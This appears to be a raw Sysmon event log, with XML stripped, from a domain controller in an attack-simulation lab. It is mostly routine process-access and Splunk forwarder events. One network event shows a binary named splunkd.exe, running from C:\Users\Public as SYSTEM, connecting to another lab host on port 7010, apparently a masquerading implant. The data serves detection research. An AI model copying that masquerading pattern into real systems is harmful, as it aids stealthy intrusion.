10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-5200-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.963{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0C-5F80-5200-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.964{733EE690-3E0C-5F80-5200-000000007F01}4040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.916{733EE690-3E0C-5F80-5100-000000007F01}40684064C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 354300x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localUsermode2020-10-09 10:40:10.592{733EE690-3E01-5F80-2500-000000007F01}3052C:\Users\Public\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-7216619.attackrange.local49689-false10.0.1.12-7010- 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-5100-000000007F01}4068C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-5100-000000007F01}4068C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3E0C-5F80-5000-000000007F01}38243828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0C-5F80-5100-000000007F01}4068C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.688{733EE690-3E0C-5F80-5100-000000007F01}4068C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0C-5F80-5000-000000007F01}3824C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.682{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-5000-000000007F01}3824C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 